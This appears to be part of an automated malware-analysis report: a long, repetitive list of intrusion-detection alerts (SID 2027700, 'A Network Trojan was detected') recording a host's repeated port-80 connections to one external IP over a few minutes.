                          Timestamp:192.168.2.562.204.41.450223802027700 02/06/23-14:19:12.572504
                          SID:2027700
                          Source Port:50223
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449864802027700 02/06/23-14:17:35.997425
                          SID:2027700
                          Source Port:49864
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450131802027700 02/06/23-14:18:46.931870
                          SID:2027700
                          Source Port:50131
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449766802027700 02/06/23-14:17:02.800104
                          SID:2027700
                          Source Port:49766
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450070802027700 02/06/23-14:18:30.493721
                          SID:2027700
                          Source Port:50070
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449849802027700 02/06/23-14:17:29.835564
                          SID:2027700
                          Source Port:49849
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449775802027700 02/06/23-14:17:04.965034
                          SID:2027700
                          Source Port:49775
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449858802027700 02/06/23-14:17:32.692575
                          SID:2027700
                          Source Port:49858
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449794802027700 02/06/23-14:17:14.531025
                          SID:2027700
                          Source Port:49794
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450140802027700 02/06/23-14:18:49.757098
                          SID:2027700
                          Source Port:50140
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449696802027700 02/06/23-14:16:30.082324
                          SID:2027700
                          Source Port:49696
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449791802027700 02/06/23-14:17:11.901331
                          SID:2027700
                          Source Port:49791
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450042802027700 02/06/23-14:18:23.193844
                          SID:2027700
                          Source Port:50042
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450039802027700 02/06/23-14:18:22.475115
                          SID:2027700
                          Source Port:50039
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449922802027700 02/06/23-14:17:50.176453
                          SID:2027700
                          Source Port:49922
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449880802027700 02/06/23-14:17:39.895059
                          SID:2027700
                          Source Port:49880
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449931802027700 02/06/23-14:17:53.428938
                          SID:2027700
                          Source Port:49931
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450201802027700 02/06/23-14:19:05.341831
                          SID:2027700
                          Source Port:50201
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449836802027700 02/06/23-14:17:26.660549
                          SID:2027700
                          Source Port:49836
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450242802027700 02/06/23-14:19:17.244962
                          SID:2027700
                          Source Port:50242
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450112802027700 02/06/23-14:18:42.306783
                          SID:2027700
                          Source Port:50112
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449877802027700 02/06/23-14:17:39.154447
                          SID:2027700
                          Source Port:49877
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449706802027700 02/06/23-14:16:32.563264
                          SID:2027700
                          Source Port:49706
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449919802027700 02/06/23-14:17:49.446973
                          SID:2027700
                          Source Port:49919
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449747802027700 02/06/23-14:16:58.093214
                          SID:2027700
                          Source Port:49747
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449788802027700 02/06/23-14:17:11.171371
                          SID:2027700
                          Source Port:49788
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450099802027700 02/06/23-14:18:39.101683
                          SID:2027700
                          Source Port:50099
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450153802027700 02/06/23-14:18:53.883684
                          SID:2027700
                          Source Port:50153
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450194802027700 02/06/23-14:19:03.649008
                          SID:2027700
                          Source Port:50194
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449861802027700 02/06/23-14:17:34.059959
                          SID:2027700
                          Source Port:49861
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449903802027700 02/06/23-14:17:45.622795
                          SID:2027700
                          Source Port:49903
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449991802027700 02/06/23-14:18:08.977328
                          SID:2027700
                          Source Port:49991
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450058802027700 02/06/23-14:18:27.099530
                          SID:2027700
                          Source Port:50058
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449950802027700 02/06/23-14:17:59.104527
                          SID:2027700
                          Source Port:49950
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449725802027700 02/06/23-14:16:43.045430
                          SID:2027700
                          Source Port:49725
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449918802027700 02/06/23-14:17:49.195230
                          SID:2027700
                          Source Port:49918
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450053802027700 02/06/23-14:18:25.872783
                          SID:2027700
                          Source Port:50053
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449691802027700 02/06/23-14:16:28.832692
                          SID:2027700
                          Source Port:49691
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449823802027700 02/06/23-14:17:23.433454
                          SID:2027700
                          Source Port:49823
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450148802027700 02/06/23-14:18:52.713607
                          SID:2027700
                          Source Port:50148
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449841802027700 02/06/23-14:17:27.862568
                          SID:2027700
                          Source Port:49841
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449997802027700 02/06/23-14:18:10.399966
                          SID:2027700
                          Source Port:49997
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449851802027700 02/06/23-14:17:30.340440
                          SID:2027700
                          Source Port:49851
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449936802027700 02/06/23-14:17:55.677694
                          SID:2027700
                          Source Port:49936
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450264802027700 02/06/23-14:19:22.564257
                          SID:2027700
                          Source Port:50264
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450025802027700 02/06/23-14:18:19.101446
                          SID:2027700
                          Source Port:50025
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450166802027700 02/06/23-14:18:56.977674
                          SID:2027700
                          Source Port:50166
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450007802027700 02/06/23-14:18:14.733547
                          SID:2027700
                          Source Port:50007
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450081802027700 02/06/23-14:18:34.695568
                          SID:2027700
                          Source Port:50081
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450086802027700 02/06/23-14:18:35.914582
                          SID:2027700
                          Source Port:50086
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450203802027700 02/06/23-14:19:05.828473
                          SID:2027700
                          Source Port:50203
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449954802027700 02/06/23-14:18:00.082620
                          SID:2027700
                          Source Port:49954
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449758802027700 02/06/23-14:17:00.787104
                          SID:2027700
                          Source Port:49758
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450138802027700 02/06/23-14:18:48.816932
                          SID:2027700
                          Source Port:50138
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450043802027700 02/06/23-14:18:23.431243
                          SID:2027700
                          Source Port:50043
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450002802027700 02/06/23-14:18:12.405676
                          SID:2027700
                          Source Port:50002
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450221802027700 02/06/23-14:19:12.104838
                          SID:2027700
                          Source Port:50221
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449946802027700 02/06/23-14:17:58.119195
                          SID:2027700
                          Source Port:49946
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449969802027700 02/06/23-14:18:03.665186
                          SID:2027700
                          Source Port:49969
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450020802027700 02/06/23-14:18:17.901532
                          SID:2027700
                          Source Port:50020
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449928802027700 02/06/23-14:17:51.819640
                          SID:2027700
                          Source Port:49928
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450061802027700 02/06/23-14:18:27.966194
                          SID:2027700
                          Source Port:50061
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449768802027700 02/06/23-14:17:03.301035
                          SID:2027700
                          Source Port:49768
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449987802027700 02/06/23-14:18:08.011491
                          SID:2027700
                          Source Port:49987
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449763802027700 02/06/23-14:17:02.065956
                          SID:2027700
                          Source Port:49763
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449964802027700 02/06/23-14:18:02.489492
                          SID:2027700
                          Source Port:49964
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449786802027700 02/06/23-14:17:07.678071
                          SID:2027700
                          Source Port:49786
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449982802027700 02/06/23-14:18:06.788989
                          SID:2027700
                          Source Port:49982
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450091802027700 02/06/23-14:18:37.165425
                          SID:2027700
                          Source Port:50091
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450211802027700 02/06/23-14:19:08.508471
                          SID:2027700
                          Source Port:50211
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449959802027700 02/06/23-14:18:01.254903
                          SID:2027700
                          Source Port:49959
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449800802027700 02/06/23-14:17:17.654882
                          SID:2027700
                          Source Port:49800
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450033802027700 02/06/23-14:18:21.009110
                          SID:2027700
                          Source Port:50033
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450030802027700 02/06/23-14:18:20.273308
                          SID:2027700
                          Source Port:50030
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450189802027700 02/06/23-14:19:02.451596
                          SID:2027700
                          Source Port:50189
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449956802027700 02/06/23-14:18:00.553096
                          SID:2027700
                          Source Port:49956
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450107802027700 02/06/23-14:18:41.040652
                          SID:2027700
                          Source Port:50107
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450048802027700 02/06/23-14:18:24.617450
                          SID:2027700
                          Source Port:50048
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449778802027700 02/06/23-14:17:05.707869
                          SID:2027700
                          Source Port:49778
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449892802027700 02/06/23-14:17:42.833784
                          SID:2027700
                          Source Port:49892
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450241802027700 02/06/23-14:19:16.998707
                          SID:2027700
                          Source Port:50241
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450226802027700 02/06/23-14:19:13.307960
                          SID:2027700
                          Source Port:50226
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449821802027700 02/06/23-14:17:22.892786
                          SID:2027700
                          Source Port:49821
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450063802027700 02/06/23-14:18:28.448526
                          SID:2027700
                          Source Port:50063
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449773802027700 02/06/23-14:17:04.487846
                          SID:2027700
                          Source Port:49773
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449913802027700 02/06/23-14:17:48.004988
                          SID:2027700
                          Source Port:49913
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449992802027700 02/06/23-14:18:09.210071
                          SID:2027700
                          Source Port:49992
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449995802027700 02/06/23-14:18:09.929475
                          SID:2027700
                          Source Port:49995
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449735802027700 02/06/23-14:16:51.844624
                          SID:2027700
                          Source Port:49735
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449776802027700 02/06/23-14:17:05.213338
                          SID:2027700
                          Source Port:49776
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449854802027700 02/06/23-14:17:31.105331
                          SID:2027700
                          Source Port:49854
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450005802027700 02/06/23-14:18:14.255721
                          SID:2027700
                          Source Port:50005
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449984802027700 02/06/23-14:18:07.273532
                          SID:2027700
                          Source Port:49984
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450176802027700 02/06/23-14:18:59.358931
                          SID:2027700
                          Source Port:50176
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449813802027700 02/06/23-14:17:20.872292
                          SID:2027700
                          Source Port:49813
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450135802027700 02/06/23-14:18:47.882067
                          SID:2027700
                          Source Port:50135
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449926802027700 02/06/23-14:17:51.137580
                          SID:2027700
                          Source Port:49926
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449707802027700 02/06/23-14:16:32.799134
                          SID:2027700
                          Source Port:49707
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450071802027700 02/06/23-14:18:31.257000
                          SID:2027700
                          Source Port:50071
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450254802027700 02/06/23-14:19:20.138555
                          SID:2027700
                          Source Port:50254
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449748802027700 02/06/23-14:16:58.336552
                          SID:2027700
                          Source Port:49748
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449967802027700 02/06/23-14:18:03.193009
                          SID:2027700
                          Source Port:49967
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450076802027700 02/06/23-14:18:33.527817
                          SID:2027700
                          Source Port:50076
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450213802027700 02/06/23-14:19:10.017712
                          SID:2027700
                          Source Port:50213
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450035802027700 02/06/23-14:18:21.518036
                          SID:2027700
                          Source Port:50035
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449789802027700 02/06/23-14:17:11.410184
                          SID:2027700
                          Source Port:49789
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450056802027700 02/06/23-14:18:26.630496
                          SID:2027700
                          Source Port:50056
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449694802027700 02/06/23-14:16:29.585296
                          SID:2027700
                          Source Port:49694
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450145802027700 02/06/23-14:18:51.997575
                          SID:2027700
                          Source Port:50145
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449783802027700 02/06/23-14:17:06.930392
                          SID:2027700
                          Source Port:49783
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449872802027700 02/06/23-14:17:37.956883
                          SID:2027700
                          Source Port:49872
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449933802027700 02/06/23-14:17:54.746193
                          SID:2027700
                          Source Port:49933
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449961802027700 02/06/23-14:18:01.749516
                          SID:2027700
                          Source Port:49961
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449844802027700 02/06/23-14:17:28.581102
                          SID:2027700
                          Source Port:49844
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450111802027700 02/06/23-14:18:42.055400
                          SID:2027700
                          Source Port:50111
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450117802027700 02/06/23-14:18:43.523915
                          SID:2027700
                          Source Port:50117
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449755802027700 02/06/23-14:17:00.032530
                          SID:2027700
                          Source Port:49755
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450200802027700 02/06/23-14:19:05.093129
                          SID:2027700
                          Source Port:50200
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450206802027700 02/06/23-14:19:06.573238
                          SID:2027700
                          Source Port:50206
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449951802027700 02/06/23-14:17:59.351611
                          SID:2027700
                          Source Port:49951
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449939802027700 02/06/23-14:17:56.379898
                          SID:2027700
                          Source Port:49939
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450022802027700 02/06/23-14:18:18.367475
                          SID:2027700
                          Source Port:50022
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449905802027700 02/06/23-14:17:46.099037
                          SID:2027700
                          Source Port:49905
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450196802027700 02/06/23-14:19:04.123385
                          SID:2027700
                          Source Port:50196
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450066802027700 02/06/23-14:18:29.146657
                          SID:2027700
                          Source Port:50066
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450173802027700 02/06/23-14:18:58.637896
                          SID:2027700
                          Source Port:50173
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449816802027700 02/06/23-14:17:21.645116
                          SID:2027700
                          Source Port:49816
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450262802027700 02/06/23-14:19:22.073797
                          SID:2027700
                          Source Port:50262
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449793802027700 02/06/23-14:17:12.843598
                          SID:2027700
                          Source Port:49793
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450084802027700 02/06/23-14:18:35.437223
                          SID:2027700
                          Source Port:50084
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449882802027700 02/06/23-14:17:40.393565
                          SID:2027700
                          Source Port:49882
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450257802027700 02/06/23-14:19:20.856195
                          SID:2027700
                          Source Port:50257
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449704802027700 02/06/23-14:16:32.045624
                          SID:2027700
                          Source Port:49704
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449923802027700 02/06/23-14:17:50.412938
                          SID:2027700
                          Source Port:49923
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449971802027700 02/06/23-14:18:04.128227
                          SID:2027700
                          Source Port:49971
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450127802027700 02/06/23-14:18:45.946491
                          SID:2027700
                          Source Port:50127
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449727802027700 02/06/23-14:16:43.531561
                          SID:2027700
                          Source Port:49727
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450168802027700 02/06/23-14:18:57.456115
                          SID:2027700
                          Source Port:50168
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450038802027700 02/06/23-14:18:22.237631
                          SID:2027700
                          Source Port:50038
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450234802027700 02/06/23-14:19:15.265931
                          SID:2027700
                          Source Port:50234
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449745802027700 02/06/23-14:16:57.611373
                          SID:2027700
                          Source Port:49745
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450216802027700 02/06/23-14:19:10.901301
                          SID:2027700
                          Source Port:50216
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449834802027700 02/06/23-14:17:26.192657
                          SID:2027700
                          Source Port:49834
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450050802027700 02/06/23-14:18:25.142675
                          SID:2027700
                          Source Port:50050
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450180802027700 02/06/23-14:19:00.308509
                          SID:2027700
                          Source Port:50180
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450186802027700 02/06/23-14:19:01.729093
                          SID:2027700
                          Source Port:50186
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450183802027700 02/06/23-14:19:01.029659
                          SID:2027700
                          Source Port:50183
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450094802027700 02/06/23-14:18:37.890736
                          SID:2027700
                          Source Port:50094
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450275802027700 02/06/23-14:19:25.216519
                          SID:2027700
                          Source Port:50275
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449803802027700 02/06/23-14:17:18.396345
                          SID:2027700
                          Source Port:49803
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450097802027700 02/06/23-14:18:38.635757
                          SID:2027700
                          Source Port:50097
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450015802027700 02/06/23-14:18:16.703906
                          SID:2027700
